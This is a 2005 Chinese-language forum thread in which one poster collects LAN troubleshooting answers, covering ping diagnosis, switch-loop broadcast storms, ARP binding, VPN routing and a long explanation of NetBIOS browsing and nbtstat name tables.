    折半步骤三：确定是安全设置问题还是网卡设置问题
    执行"ping "命令，若发出的数据包得到回应(屏幕上返回的是"reply from 10.91.20.1:bytes=32 time〈10ms ttl=128"之类的信息〉，则问题应出在本机的相应安全设置上。当然，这些安全设置许多情况下并非人为改变，而是由于误操作或病毒引起的。这种情况下，如果是Windows 98系统，重装IE即可；若为Windows 2000系统，还应看一下IP安全的相关设置，判断是否存在端口地址屏蔽等。若能上网，但许多网站进不去，或电子邮箱无法登录，则一定是IE被修改，重装IE可解决。若发出数据包无回应，则问题应该出在本机网卡的相关设置上。如若确定为网卡相关设置问题，请进行步骤四。
    折半步骤四：确定是网卡驱动程序安装有问题还是IP相关属性设置不当
    执行"ping 127.0.0.1"命令，确定是否有回应数据包。如果有，而且在网上邻居中能看到自己，则网卡驱动一般没问题，问题焦点应集中在网卡的IP属性设置上。如果局域网内计算机设置为"自动获取IP地址"，查看一下WINS配置标签，注意"使用DHCP进行WINS解析"项是否被选中，如果没有，选中即可。如果局域网内计算机TCP/IP设置为"指定IP地址"，则检查重点放在IP地址、子网掩码、DNS、网关及WINS的相关设置上。这些内容与单位的局域网配置有关，请灵活掌握。如果ping 127.0.0.1没有回应，那么网卡驱动安装一定有问题。重新安装，并进行相应配置。
    还有一种情况很特殊，用ping命令可以ping通自己，网上邻居却看不到任何计算机，检查TCP/IP各项配置都没有问题，但就是不能上网。这种问题多数是由计算机病毒引起的，杀毒并重新安装网卡驱动就能解决问题。笔者曾遇到过几例这种现象，用此方法都得到顺利解决。
    因为不同局域网具体配置情况不一样，相关问题请灵活处理。

--------------------------------------------------------------------------------
作者: 人魔　　时间: 2005-12-30 02:41　　 标题: 局域网经典故障解决

[这个贴子最后由人魔在 2005/12/30 02:55am 第 1 次编辑]

平息环路造成的广播风暴

    笔者是一个网管。最近我们的局域网进行改造，网线全部重新走，原来整个网有70个点，全部是星型结构，现在增加了30多个用户，也就是说只要增加一个交换机就可以了。现在的网络结构是这样的：整个网全部采用的是星型拓扑结构，中心机房配备一台TCL的三层交换机，服务器主要提供FTP、文件服务、Web等多项服务。各楼层采用TCL的交换机，全部带有VLAN技术，各个终端通过百兆Avaya网线接入网络。网络刚开始用的时候各方面还不错，可是最近网络却时常掉线，有时甚至干脆罢工。领导要俺三天就解决问题，要不就和他说拜拜。呜，呜，呜……好在功夫不负有心人，经过俺三个日夜的苦思冥想终于搞定了这个问题。现在，同事们都喊我黄工，工资恐怕也会大幅上涨，哈哈哈……下面言归正传：
    话说某年某月某日，有N个用户反映网络连接情况时通时断，网上邻居有时也不能互访，由于故障用户分布在多个楼层，故障点不集中，所以影响特别不好。刚开始以为是信息量过大交换机的端口堵塞，把交换机、服务器重启了N遍，还是不行。得，我们赶紧商量从软件着手，先从服务器上杀毒，然后把各个交换机关掉，对每台机器杀毒，可是故障仍然存在。在Ping网络中的部分服务器或计算机时，依旧丢包，网络时断时续。
    天呀，我都快疯了！当天晚上回家，仔细地回忆了一下当天的故障，发现当我在杀毒并断开个别的交换机时，网络恢复了正常，而我再次插上去的时候，就再次断线。想到这里，好像有了一点眉目。第二天上班时，我断掉所有的交换机，然后一个个地插上，直到找到出问题的那个。经过仔细的观察，终于发现问题所在。原来当时做这个网时，核心交换机和子交换机之间都留了两根级联线，平常都只插一个，另一个备用。而在这个交换机上两根都插上了，当交换机上的用户向另一个用户发送信息时，数据包就会沿着另一根备用的线，通过核心交换机循环地发送数据包。当信息量大的时候，就会浪费核心交换机的资源，造成网速下降直到断线。
    此次故障主要是由于网络中有环路存在，造成每一帧都在网络中重复广播，引起了广播风暴。要消除这种网络循环连接带来的网络广播风暴可以使用STP协议，大家可以查阅思科等相关的书籍，在这就不多说了。另外，以后我们在做比较大型的网络时，一定要建立详细的档案，包括网络布线图、IP及MAC对应表等，并在网线上套数码管。这次故障经查证就是因为一个新来的同事粗心造成的。

--------------------------------------------------------------------------------
作者: 人魔　　时间: 2005-12-30 02:42　　 标题: 局域网经典故障解决

IP与MAC绑定的难题
    问：我的计算机原来采用公网固定IP地址。为了避免被他人盗用，使用“arp -s ip mac”命令对MAC地址和IP地址进行了绑定。后来，由于某种原因，又使用“arp -d ip mac”命令取消了绑定。然而，奇怪的是，取消绑定后，在其他计算机上仍然不能使用该IP地址，而只能在我自己的计算机上使用。需要说明的是，我的计算机并不是代理服务器。
    答：虽然在TCP/IP网络中，计算机往往需要设置IP地址后才能通讯，然而，实际上计算机之间的通讯并不是通过IP地址，而是借助于网卡的MAC地址。IP地址只是被用于查询欲通讯的目的计算机的MAC地址。
    ARP协议是用来向对方的计算机、网络设备通知自己IP对应的MAC地址的。在计算机的ARP 缓存中包含一个或多个表，用于存储 IP 地址及其经过解析的以太网MAC地址。一台计算机与另一台IP地址的计算机通讯后，在ARP缓存中会保留相应的MAC地址。所以，下次和同一个 IP地址的计算机通讯，将不再查询MAC地址，而是直接引用缓存中的MAC地址。另外，需要注意的是，通过“-s”参数添加的项属于静态项，不会造成ARP缓存超时。只有终止TCP/IP协议后再启动，这些项才会被删除。所以，即使你取消了绑定，在短时间内其他计算机将仍然认为你采用的是原有IP地址。
    在交换式网络中，交换机也维护一张MAC地址表，并根据MAC地址将数据发送至目的计算机。当绑定IP与MAC地址后，只要与交换机通讯过，交换机就会记录下该MAC地址。这样一来，即使后面有人使用了相同的IP地址，将依然不能与网关通讯，更连不通外面了，除非重新启动交换机、清除MAC表，或者MAC地址表超过了指定的老化时间

--------------------------------------------------------------------------------
作者: 人魔　　时间: 2005-12-30 02:43　　 标题: 局域网经典故障解决

局域网是用HUB连接的10Mbps以太网，为什么在传输文件时系统提示只有800KB~900KB/s的传
这是因为速率的计量方式不同。

    一种是Bit比特位，一种是Byte字节。通常在1个Byte里有8个Bits。网络带宽通常以bps（标称bit/s）作为计量单位，即“Bits-Per-Second（每秒的比特位数量，通常又被译为波特率）”，而许多下载工具软件的计量单位是Byte/s，所以，两者之间相差8倍。
    除开计量方式的问题，网络无法达到标称传输速率的主要原因包括：
    集线器的限制。集线器为10Mbps共享带宽，如果所有端口均处于通讯状态，每个端口可获得的传输速率约每秒0.625MB（计算方法为10÷16）。若欲获得接近理论带宽的传输速率，必须采用交换机作为集线设备。
    网卡的原因。如果网卡质量不好，发出的数据包经常出现错误，导致数据包经常重发，或收到的数据包错误比较多，也会导致拷贝文件速度降低。
    网线的原因。如果网线太长，信号衰减比较厉害，或者虽然网线距离近，但网线质量不好，也不能达到理论速度。另外，当网络繁忙时，也达不到理想速度。
20、
    问：7个用户通过交换机连接并准备借助ADSL Modem的路由功能实现Internet连接共享。ISP提供了一个固定的IP地址，并且将网卡的MAC地址绑定了，开机即可接入Internet，而不是采用虚拟拨号方式。请问，应当如何配置该ADSL Modem才能实现Internet连接共享?
    答：如果ISP将IP地址与网卡的MAC地址绑定在一起，是不能通过ADSL Modem的路由功能实现共享上网的。原因很简单，每块网卡都有一个独一无二的MAC地址，因此，其他计算机对Internet连接的访问将被拒绝。惟一的解决之道，只能是将ADSL Modem连接到ISP已绑定MAC地址的那台计算机上，并将该计算机设置为代理服务器，其他计算机作为客户端实现Internet连接共享。
21、　问：请问用VPN如何能使两个局域网通过Internet互相访问?试过一台用Modem拔号的机器用VPN方式可以接入局域网中，但只找到服务器，看不到别的机器，为什么呢?
    答：首先需要说明，VPN主要作用是为一台客户机远程访问VPN服务器或通过VPN服务器访问VPN服务器所在的网络。两个局域网通过Internet互相访问对方网络内的计算机，只能做VPN路由。
    如果一台远程客户机访问VPN服务器及其所在网络，需要正确配置VPN服务器，主要是VPN服务器为远程客户机分配IP地址的问题。当VPN服务器与DHCP服务器不在同一台计算机上时，可以使用DHCP方式为远程客户机分配IP地址；当VPN服务器与DHCP服务器在同一台计算机上时，只能使用静态地址分配方法，在“VPN服务器属性→IP选项卡”中设置。
    拨号之后不能访问局域网，是没有分配到合法的局域网的IP地址。另外，使用VPN拨号时，拨号端一定要有合法的IP地址，否则拨叫VPN服务器是没有意义的。
    设置VPN路由连接两个局域网时，需要双方在VPN服务器的“路由和远程访问→路由接口”中创建“请求拨号接口”并创建路由表。
    如果每台VPN服务器都有合法的IP地址，可以创建静态路由（在“IP路由选择→常规路由”中添加），如果VPN服务器没有合法的IP地址，可以使用RIP协议创建动态路由（在“IP路由选择→常规”中添加“新路由选择协议→用于Internet协议的RIP版本2”）并正确配置。
    当VPN服务器没有合法的IP地址时，对端VPN服务器拨叫本地VPN服务器时会出现问题。此时，可以在没有合法IP地址的VPN服务器上使用动态域名解析软件并为此VPN服务器申请一个域名，对端VPN服务器拨叫此域名即可。

--------------------------------------------------------------------------------
作者: 人魔　　时间: 2005-12-30 02:43　　 标题: 局域网经典故障解决

网关挤占80端口
    问：本人所架设服务器的操作系统为Windows 2000服务器版，开有WWW、DNS、FTP（SERV-U）、E-mail（Web EasyMail）服务。指定私有IP地址“172.16.108.a”，通过交换口指定外网IP“218.106.98.b”，绑定内网IP“172.16.108.a”，这样通过域名指向，可以让外网用户访问我的服务器。但Web服务器80端口始终不能访问。后来，我又在Web中增加了81端口，通过外网IP的81端口能完全访问至Web页面。对此是否需要设置端口映射（服务器适配器为单RJ45/10Mbps LAN接口）?网关的设置会不会有问题?
    答：从你的问题来看，应该是你的网关占用了80端口，而“又在Web中增加了81端口，通过外网IP的81端口能完全访问至Web页面”说明你使用80之外的端口， 网关就可以转发，进一步说明了服务器没有问题。一般来说，不用进行端口映射。
    判断服务器是否故障，可以用替换法：
    ①另外找台工作站，只安装IIS（默认安装），并安装一块网卡（设置成172.16.108.a并正确设置网关），用这台计算机暂时代替你的服务器，在外网上访问218.106.98.b看能否成功，如果能，说明故障在你这里，否则故障在网关处。
    ②把你这台计算机暂时从网络上断开，安装一个Modem，拨号上网，然后在命令窗口下输入ipconfig，查看你获取的外网地址，让其他人在IE里面访问你的这个拨号Modem获取的IP地址看能否访问，若能则说明你的计算机没有故障；若不能，则说明故障在计算机（如果你的IIS设置中指定了地址，请修改为正确的地址，即Modem拨号后获取的地址）。

--------------------------------------------------------------------------------
作者: 人魔　　时间: 2005-12-30 02:44　　 标题: 局域网经典故障解决

双机直连的权限问题
    问：两台装Windows XP系统的笔记本电脑在使用双绞线直连时，连接不稳定，且对方计算机经常无法浏览，甚至连工作组都打不开，提示“\\计算机名称\ShareDocs无法访问。你可能没有权限使用网络资源。请与这台服务器的管理员联系以查明你是否有访问权限。不能访问网络位置。”原因何在?
    答：这必须解决IP地址和用户的权限问题，有以下几个方法：
    第一，可以给每一台笔记本电脑设置一个私有的IP地址，如一个为192.168.1.10，另一个为192.168.1.20，子网掩码都是255.255.255.0。或者两者均采用“自动获取IP地址”方式，使其自动获取“169.254.0.1~169.254.255.254”段的IP地址。
    第二，在每台笔记本电脑上启用“Guest”账户。从“管理工具”中运行“计算机管理”，选择“本地用户和组-用户”，在右侧的窗格中用鼠标右键单击“Guest”，选择“属性”，在“常规”选项卡中取消“账户已停用”。
    第三，打开“资源管理器”，从“工具”菜单选择“文件夹属性”，从“查看”选项卡的“文件和文件夹”中取消“使用简单文件夹共享（推荐）”。
    第四，打开“本地连接”，确认在“本地连接”属性的“高级”选项卡中，没有启用Internet连接防火墙。
    第五，在“网络连接”窗口中单击“设置家庭或小型办公网络”，运行“网络安装向导”，选择“这台计算机属于一个没有Internet连接的网络”。然后，打开Windows资源管理器，设置共享文件夹
--------------------------------------------------------------------------------
作者: 人魔　　时间: 2005-12-30 02:45　　 标题: 局域网经典故障解决

NETBIOS与网上邻居的浏览剖析
  有关网上邻居的问题，问的人一直比较多，在理解上存在的误区也普遍较为严重。鉴于Microsoft的NETBIOS文档不是很细致，我四处收集了一些相关资料加上自己的实践经验写了这个系列，希望能对大家有所帮助．
  本来想为了增加可读性，把这个系列写成问答的形式，不过一时之间脑袋里也编不出这么多的问题，还是按部就班先感性的对微软的浏览服务作一大致介绍，然后再深入剖析NETBIOS的具体工作机理,大家要是有什么问题,可以提出来我们一起讨论.
计划分三部分来讲,微软网络浏览过程,深入NETBIOS剖析,以及网络设置详述
***微软网络浏览过程简介***
在“Windows NT系统管理技术内幕”一书中，讲到了一个非常具有代表性的问题，我把它摘抄了下来：
问：什么情况下会导致在网络邻居中计算机能看见却无法访问或可以访问却看不见？请选择最佳答案： A.你的网络存在物理问题,比如网线 B.作为域主浏览器的Windows NTserver的浏览服务坏了 C.Windows NTserver网卡有问题 D.你的网络没有问题,用户描述的是正常的微软浏览现象
正确答案
书上的解释:微软的网络浏览可能在使用中出现"中断",而实际上它们并没有中断, 这种误解是由于用户对微软网络浏览的处理过程不熟悉造成的。
就象同学们经常在抱怨的“为什么别人的网上邻居可以用，我的却不行？”“为什么有时候可以浏览，有时候却无法浏览网络？”解铃还须系铃人，让我们一起去看看微软的网络浏览到底是如何实现的。鉴于大家可能对NT的“域”概念还不甚了解，出现浏览故障的也多为98的机子，我将以98的“工作组模式”为大家讲解。
1.什么是浏览列表（Browsing List） 在微软网络中，用户可以在浏览列表里看到整个网络（何指？子网还是广播域？大家可以考虑考虑）上所有的计算机。当你通过网上邻居窗口打开整个网络时，你将看到一个工作组列表，再打开某个工作组，你将看到里面的计算机列表（也可在 DOS方式下用net view /domain:workgroupname命令得到），这就是我们所说的 Browsing List。工作组从本质上说就是共享一个浏览列表的一组计算机，所有的工作组之间都是对等的，没有规定不可以让所有的计算机同处于一个工作组中。
2.浏览列表在哪里 曾在木棉上看到过一场争论，有人说：网上邻居里的计算机列表是广播查询得来的。可有人举反例说：我的同学都关机了，可我还是能在网上邻居里看到它，应该是从HUB或交换机之类较为固定的设备的缓存中取得的。 其实他们都只说对了一个方面，把他们二人的说法结合起来就是正确答案了--- 浏览列表是通过广播查询浏览主控服务器，由浏览主控服务器提供的。
3.浏览主控服务器又是什么 浏览主控服务器是工作组中的一台最为重要的计算机，它负责维护本工作组中的浏览列表及指定其他工作组的主控服务器列表，为本工作组的其他计算机和其他来访本工作组的计算机提供浏览服务，每个工作组都为会每个传输协议选择一个浏览主控服务器，而我们经常遇到的无法浏览网络的错误大多是因为你所处的工作组没有浏览主控服务器而造成的。你可以在一个工作组中用NBTSTAT -a computername 命令找出使用NBT协议的浏览主控服务器，它的标识是含有\\_MSBROWSE_名字段。
4.浏览主控服务器是如何指定的 缺省情况下，win98工作组中的浏览主控服务器是该工作组中第一台启用文件及打印机共享功能的计算机，也允许手工将一台win98计算机配置为浏览主控服务器（方法会在后面讲述网络配置时具体介绍，但由于浏览主控服务器需要维护动态浏览列表，性能会受影响），如果一个工作组中有多台计算机配置了这个选项，或是当前的浏览主控服务器关闭了系统，又没有其他计算机启用主控设置时，就要进行主控浏览器的选举。
5.如何通过浏览器选举产生浏览主控服务器 关于浏览器的选举报文,不太好抓包,我就只好按书上的东西来讲述了.其实过程很简单,首先由一台计算机发送一个选举临界报文,该报文包含了来自发送计算机的信息(操作系统,版本及NETBIOS名等),选举报文向网络中广播,工作组中的每一台计算机都会用自身信息与选举报文进行优先级比较,主要是操作系统起主要作用,记得好像是NT Server>NT Workstation>Win98>WFWG,反正到最后是那个自身条件最好的成为新的浏览主控服务器.
6.整个网络浏览的过程是怎样的 当一台win98进入网络时，如果它带有服务器服务（启用了文件及打印机共享）会向网络广播宣告自己的存在，而浏览主控服务器会取得这个宣告并将它放入自己维护的浏览列表中；而没有在相应协议上绑定文件及打印机共享的计算机则不会宣告，因而也就不会出现在网络邻居里了。当客户计算机想获得需要的网络资源列表时，首先会广播发出浏览请求，浏览主控服务器收到请求后，如果请求的是本组的浏览列表，则直接将客户所需的资源列表发回；如果请求的是其它工作组的浏览列表，浏览主控服务器会根据本身Browsing List中的记录找到相应工作组的主控浏览器返回给用户，用户可从那里得到它想要的浏览列表。至于如何去和另一台计算机共享交换资源，就不是我们这里要讨论的问题了。
明白了网络浏览的原理，下面我给大家讲一个有用的应用，现在很多同学出于安全的考虑都不太欢迎陌生人通过网上邻居访问自己的机子，可有时下部电影又需要给认识的同学共享出来，因而还不能删除文件及打印机共享服务。怎么办？有些人给共享名加个&#36;，以达到隐藏的效果，可这用DOS下的net share是可被看到的；有些人给共享加上密码，可听说这也是有办法破解的，而且很容易激起“黑客同志”的好奇心。有没有办法将自己的机器在网络邻居里隐藏起来呢？而对于认识的同学可以让他用\\IP 来访问。想对了，关键就是要阻止自己的机器向网络中去宣告自己，而且我知道我们其中的一些人已经将此变成了现实，至于方法嘛，就不要来问我了。
注：因为有关win98浏览服务的资料很少，涉及的书籍也多为以NT的“域”模型进 行介绍，因而我只能根据自己的理解结合netxray的实践来测试，细节部分难 免有错，欢迎大家指正。
7.在我的网上邻居里为什么有些机子访问不了 如果微软的网上邻居真能做到所见即所得，相信抱怨它的人不会象现在这么多，可通过前面对浏览服务的介绍，大家已经知道这是不可能的，因为浏览列表的获得不是通过访问其中每一台机子得到的，很多时候网络中的计算机并不能正确更新浏览列表。当一台计算机正常关机时，它会向网络发出广播宣告，使浏览主控服务器及时将它从浏览列表中删除；而非正常关机后，浏览列表里仍会把该条目保持很长一段时间(NT下是45分钟),这就是我们仍能在网络邻居里看到它的原因.而98的稳定性是众所周知的 ----在还没来得及关机前就已经崩溃了^-^
这第一部分就先写到这里，不知大家的感觉如何，想来都觉得是看得挺过瘾，却解决不了什么问题，比如浏览网络的必要条件是什么，NetBEUI？TCP/IP？文件及打印机共享还是NETBIOS API？用\\IP浏览远程主机的原理是什么？查找计算机可以跨路由器查找吗？喜欢动手的同学完全可以自己用Netxray去搞清楚，懒惰一点的嘛就做好准备等着看下一部分--深入NETBIOS剖析了。

--------------------------------------------------------------------------------
作者: 人魔　　时间: 2005-12-30 02:46　　 标题: 局域网经典故障解决

深入NETBIOS剖析********
在这部分里，我首先将对NETBIOS作一些基础性的介绍，然后主要针对LANA编号， NETBIOS名字表，NBT这三方面对NETBIOS的特性进行讲解，使大家对NETBIOS接口通讯的原理有所了解，并掌握使用NETBIOS名字表来识别网上邻居浏览故障及其排除的方法。其中可能要借助一些网络命令，如net,nbtstat等，若有不会使用的同学请自行查阅windows帮助文档（最好看NT下的，98的有点渣渣），这里就不作解释了。
熟悉网络编程的同学都知道，在Windows下有两套重要的网络API，WINSOCK和 NETBIOS。平时我们用IE浏览网页，用FOXMAIL收发邮件以及用OICQ聊天用的都是 WINSOCK API，但还有一部分网络应用需要用到传统网络接口NETBIOS，浏览网上邻居和共享文件就是其中的典型。虽然微软已经在其最新的WINSOCK API里加入了对AF_NETBIOS地址族的访问，并打算从它的win2000中使对NETBIOS API的支持变成可选项，但NETBIOS的真正消亡还有待时日。这里我不想翻开NETBIOS厚重的历史去评判它的优劣来浪费大家的时间。存在即是真理，我们切入正题好了。 NETBIOS API的最大优点就是使得编程接口“与协议无关”---应用程序可通过TCP/IP，NetBEUI以及IPX/SPX来运行。
举个例子来说，如果你在网络属性里同时添加了这三种协议，那当你通过网上邻居浏览某台机子的资源时能确定用的是哪种协议在和它进行通信吗？不过由于这种“与协议无关”性是通过对传输协议本身进行改造，在相应协议上添加NETBIOS接口实现的，所以也就产生了一些局限性：
一是并非所有的协议都支持NETBIOS，我们知道的就只有上面提到的那三种协议实施了NETBIOS接口（也许在它们前面加个Microsoft标识更恰当些）；
二就是我在前面提过的LANA编号的问题了，LANA号的提法在多宿主机环境下可能更准确些，对于我们一般只安装有一块网卡的机子来说大家就把它简单理解成一种通讯协议的对称性就可以了。
举个例子，A只安装了TCP/IP，B只安装了NetBEUI，虽然他们都在协议上绑定了NETBIOS接口，但彼此在网络邻居里是看不到的。这也提醒我们要想在网络邻居里看到最多的机子，就要把三个协议全部安装。为了后文叙述的方便，我们把启用了NETBIOS的三种协议分别用一个名字来表示：NetBT/NBT（TCP/IP）、Nbf（NetBEUI）、NwlnkNb（IPX/SPX），它们各对应一个 LANA号，只有相同的LANA号之间才能建立通信连接。
接下来要说的就是最为关键的NETBIOS名字的问题了。对于BSD系统，每台机器都有一个主机名，从而也引出了DNS的概念，这也可以说是UNIX和TCP/IP紧密结合的产物。而Windows可没有跟某种协议有近亲关系，在它眼里只有机器名（即NETBIOS名）才是最关键的。
在win32环境中，针对每个可用的LANA编号，每个进程都会为其维持一张NETBIOS名字表。我们可以用nbtstat -n命令获得本机与NBT相关的名字表（你要是连TCP/IP都没安，可别来问我为什么不能用）。NETBIOS 名字分两种类型：唯一名（UNIQUE）和组名（GROUP）。唯一名很好理解，就是说在同一子网上要独一为二（注意我这里没有用广播域，这在我的第三部分里我会结合以前的一些讨论详作说明）；而组名的作用是可以实现多播数据通讯。结构上也由两部分组成：字符串和Scope ID。这里的字符串就是我们给自己的计算机、工作组起的名字，而且对所能使用的字符及其长度都有限制，大家自己去查书，我就不在这里浪费时间了，需要说明的是一些同学为了“隐藏”自己，把自己的机器名起的象个IP一样，如0.0.0.0(真不知是那位高人教大家的，呵呵）其实字符“."是不允许做机器名的，从这个角度讲win98真是太渣渣了（误导群众，怪不得老死机，该！）而NT在这方面做的就好多了。我主要讲解的是Scope ID域，它占用NETBIOS名的最后一个字节，最大的作用莫过于可以标识不同的Microsoft 网络服务了，因为它是NETBIOS名的一部分，因此UNIQUE name允许两台computername 相同，但scope ID不同的计算机在同一子网上存在。我不打算摘抄大段的NETBIOS 标识符给大家，这里就以我机子上的一个NETBIOS名字表为例给大家讲解一下常用的NETBIOS标识符类型：
C:\>nbtstat -n NetBIOS Remote Machine Name Table Name Type Status ---------------------------------------------
CJT <00> UNIQUE Registered
CJT<00>代表工作站服务，每一台上网的计算机必须首先注册的唯一标识符，这也是进行网络邻居浏览的唯一必要条件。在同一子网上的其它机子可以用ping CJT得到我的IP，注意这可跟DNS没有关系，是通过广播查询CJT<00>得到的，因为TCP/IP和NETBIOS有绑定。
MINEGROUP <00> GROUP Registered
这条没什么可说的，但凡把工作组名设成MINEGROUP的机子都会注册这一项，从而同一子网上的某些机子间建立一种特定的逻辑关联，使对于MINEGROUP<00>进行的通讯只被这些机子接收，这里大家可以考虑不在MINEGROUP的机子对这些报文的处理过程。虽说这一项是名字表里最不重要的一项，但大多数同学无法浏览网上邻居的故障却都和它有关哦！等会儿我会说明。还有大家可以想想，要是你的工作组名和别人的机器名起的一样会出现什么事情呢？
CJT <03> UNIQUE Registered CJT<03>代表消息服务，就是那个在win2000下突然弹出个窗口来说“某某某侵犯版权” 的东东。其实这是个挺好的服务，可以让我们用win9X下的WINPOPUP和winNT下的NET SEND 进行简单的消息传送。不过在NT下,CJT<03>只代表消息的接收端，要发送消息，还需注册一个CJT<01>，这也是NT第一次用net send发消息要等很久的原因，因为CJT<01>只在你用到net send时才会去注册；而9X下只用一个CJT<03>就把收发全搞定了。不过那个 WINPOPUP好象不能给自己发消息耶，真不知微软在搞啥子。
CJT <20> UNIQUE Registered 与CJT<00>相对照，CJT<20>代表服务器服务，我前面已经说过，凡是提供文件及打印机共享服务的机子就叫做SERVER，它会在入网时进行浏览器宣告，这也是一台机子可通过网上邻居“被”访问的唯一必要条件。
MINEGROUP <1E> GROUP Registered 还记得我前面说过的那个浏览器选举吗？我把<1E>标志称为候选者，这样当MINEGROUP组里的当前浏览主控服务器当机后，所有拥有<1E>标志的机子都有资格参加竞选。至于这个标志是怎么来的，记住一句话：SERVER完全同意作为默认的候选浏览主控服务器。关于这句话的理解，我后面将有一道题帮助大家认识它。
XIXI <03> UNIQUE Registered 咦？又一个<03>,这个XIXI是啥子东西？其实XIXI就是CJT的用户名了，就是那个登录提示框里的东西。使我们除了通过对方的机器名以外还可以通过他的用户名给对方发消息。不过要是和别人的名字发生了重复怎么办？会报冲突吗？不会。因为这个XIXI<03>是我们在按了回车车键以后才进行注册的。写到这里，不禁对以前那个ESC键的问题有所领悟，
原来所谓的登录网络就是干了这么一件事，那如果...如果...，企不是...呵呵，搞个测
试先。
MINEGROUP <1D> UNIQUE Registered 这个<1D>想来大家都已经猜到了，就是表明CJT是MINEGROUP里的浏览主控服务器了，当 “领导”的感觉总是这么爽。嘻嘻
..__MSBROWSE__.<01> GROUP Registered 见过这个怪东西的人肯定不少，但真正知道它用途的恐怕不多。这是一个组名，由整个子网上的所有浏览主控服务器构成，这样当MINEGROUP里的机子想要浏览其他组的资源时，CJT就凭借这个标识为大家查找那个组的浏览主控服务器，从而使我们能获得该组的浏览列表。 基本的一些标识符类型就介绍完了，只要掌握了这些，解决常见的浏览器故障已是绰
绰有余了，通过后面的一道习题大家可以实践掌握这种方法。对于还想进一步了解更多标识符类型的同学可以使用net start命令获知其它的微软服务，大多数服务都有一种标识符与其相对应。
MAC Address = 00-88-CC-23-15-54 前面POPO曾说过，使用nbtstat -A IP可以获知远程主机的MAC，至于原理，就是我们在这里最后要说的NBT了。现在大家已经知道，NBT就是建立在TCP/IP传送协议之上的NETBIOS接口，我们先将它与Nbf进行一番对比。Nbf指的是NETBIOS帧协议，以NetBEUI为基础，这可是真正的架构在链路层之上的协议哦，不过也因为它是在LLC上面，所以无法路由。只有借助一些可路由协议（如IP或IPX）才能实现跨广播域浏览因为TCP/IP发展最为迅速，最为普及，NBT也才受到大家如此的关注。
NBT提供的服务可以分成三类：名称服务（UDP137）、数据报服务（UDP138）和会话服务（TCP139）。 1）名称服务主要用于广播解决本子网的NETBIOS名和IP地址转换的关系，比如我前面那个 ping CJT的例子。因为NBT是建立在TCP/IP之上，而建立TCP/IP通讯是必须知晓双方 IP 地址的，这跟Nbf直接用MAC地址通讯很不一样。但也因为使用的是UDP广播，所以名称 服务无法跨越路由器。（这里我们只针对b-节点，不对WINS加以介绍） 2）数据报服务提供了无连接和面向广播的通信方式。它主要用于浏览列表通知，我前面也说过我们桌面上的那个网上邻居就是它构建的，此外我们用NET SEND *命令给计算机组发消息时也是*它的UDP广播（多播）能力。但也正因为它使用了UDP传输层协议，因而在跨越路由器时也会遇到与名称服务相同的问题。 3）使用面向连接TCP协议的会话服务才是我们的救星，因为它可以跨越路由器。网络中产 生的NETBIOS通信主要也是因为会话服务的使用，而文件和打印机共享服务则构成了会话 服务通信的主体。
说到这里就不得不提SMB（Server Message Block），不过要讲清楚 SMB，可能要从NCB的由来说起，那可就又是一个长篇了。这里我就教给那些还不太明白它们之间关系的同学一个简单的办法，虽不太准确，但挺实用，希望清楚的同学别给我戴上误导群众的高帽哦：-）首先SMB是一种协议，一种“应用层”的协议，一种基于SERVER/CLIENT架构的应用层协议，大家完全可以把它看成是一种HTTP，FTP或是TEL NET 而添加了文件及打印机共享服务的机子就是SERVER端，可以被其它工作站和服务器访问 如果没有添加文件及打印机共享服务，则不能被其他机子访问。当然，SMB除了提供文件 及打印机服务以外，还可以进行会话控制和交换消息，如用net send命令可直接把使用 消息类型的SMB包发给特定计算机。而且因为会话服务是建立在TCP上的，只要你能获知 远程主机IP，就可以跨越路由器。
总算不负大家所托，又凑了一篇，就不知大家看了以后是不是失望大于期望呢：-）原理的学习毕竟是枯燥的，但也是必须的。因为篇幅和水平有限，很多地方的介绍我都简略了，可能有些同学读起来会稍感困难，在后面我转了一些概念性的文档以帮助大家阅读。其实说句实话，与其看这些东西倒不如找个netxray来，亲自抓包看看到底在你打开网上邻居，开关机，共享文件，进行名字解析，名字注册时自己的机器干了些什么，远比我这东一句西一句的乱讲要强多了。 至于那些“死逮着我不放”的同学，要看下一篇，只好再等等了。
--------------------------------------------------------------------------------
作者: 人魔　　时间: 2005-12-30 02:46　　 标题: 局域网经典故障解决

我新购的网卡在电脑上无法安装，而在其他电脑上却使用正常，这是怎么回事？
    答：如果在电脑中安装好网卡后，系统没有提示找到新硬件，你可运行“添加新硬件向导”来让系统搜索新硬件。方法是单击“开始”，指向“设置”，单击“控制面板”，然后再双击“添加新硬件”。按照屏幕提示操作。你可选“让Windows搜索新硬件吗？”，单击“是（推荐）”，然后再单击“下一步”，让系统找到网卡再安装其驱动。
    而如果出现以下任何现象，网卡或者网卡所在的插槽损坏：
    1、“添加新硬件向导”检测不到网卡；
    2、“添加新硬件向导”能够检测到网卡，但无法正常工作。
    为了确定到底是网卡还是插槽的问题，可以检查网卡是否牢*插入插槽之中。如果网卡已牢*插入插槽之中，请改插到其他插槽之中试试。如果问题仍未解决，则可能是网卡损坏或与你的电脑不兼容，可更换之。

--------------------------------------------------------------------------------
作者: 人魔　　时间: 2005-12-30 02:47　　 标题: 局域网经典故障解决

问：我访问局域网中的计算机时，为什么常常被提示要输入用户名和密码？
    答：这主要是为了安全方面的考虑。而且当你重新启动计算机时又要重新输入用户名和密码，这一点确实让人会觉得很麻烦。
    你只要在需要进行文件共享的计算机上建立一个相同的用户名，并且使用相同的密码，然后局域网中的计算机都利用这个用户名和密码登录，这样在网上邻居中访问对方计算机时就不需要输入用户名和密码
--------------------------------------------------------------------------------
作者: 人魔　　时间: 2005-12-30 02:47　　 标题: 局域网经典故障解决

笑解局域网故障
1、四台机器通过一八口HUB连到CISCO1900交换机，连网速度严重变慢，查网线正常，判断四块网卡同时故障可能性不存在， HUB经验证也正常，后检查交换机发现连接该HUB的端口被设为双工，改为单工后网络恢复正常。这里应注意：连到HUB的端口不能设为双工！
    2、一台机器，杂牌8139网卡，以60米网线连于集线器，使用中突然不能上网，集线器指示灯亦熄灭，用网线测试仪测试网线正常，检查系统，网卡也正常工作，重做水晶头后故障依旧，怀疑网卡驱动能力下降，准备更换网卡。抱着试试看的想法关掉接线板电源，重新开机后却发现网络已连通。可见故障是网卡工作不稳定造成。
    3、一台机器，D-LINK530TX网卡，连于100M交换机，WINXP操作系统，加入WIN2000域，登录速度非常慢，登录后网络访问速度让人无法容忍，测试网线100M通联正常，怀疑为软件原因，于是重装网卡驱动，无效，试替换网卡，网络访问速度立即恢复正常。我们在分析局域网故障原因时，不能想当然认为只要能上网，网卡就没问题，本例这一故障现象笔者已碰到多次，确为网卡原因。

--------------------------------------------------------------------------------
作者: 人魔　　时间: 2005-12-30 02:48　　 标题: 局域网经典故障解决
